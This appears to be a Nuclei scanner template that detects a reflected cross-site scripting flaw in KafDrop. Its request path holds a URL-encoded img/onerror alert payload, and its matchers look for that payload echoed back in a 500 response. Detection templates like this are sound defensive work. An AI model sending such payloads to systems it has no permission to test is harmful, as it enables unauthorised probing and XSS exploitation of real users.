id: kafdrop-xss

info:
  name: KafDrop - Cross-Site Scripting
  author: dhiyaneshDk
  severity: high
  description: KafDrop contains a cross-site scripting vulnerability. It allows remote unauthenticated attackers to inject arbitrary HTML and/or JavaScript into the response returned by the server.
  reference:
    - https://github.com/HomeAdvisor/Kafdrop/issues/12
    - https://www.blackhatethicalhacking.com/news/apache-kafka-cloud-clusters-expose-sensitive-data-for-large-companies
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: kafdrop,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Kafdrop'
          - '<img src=x onerror=alert(2)>'
        part: body
        condition: and

      - type: status
        status:
          - 500

# digest: 4a0a00473045022100da4d1cf37774814984f2f08e352138e196c05a6bd4b9d080b49bff0a8fcd719502203e959ae3502e1d9afe1c7c9d20866ac7ab6e8d016330d633b10caa59e23f3873:922c64590222798bb761d5b6d8e72950
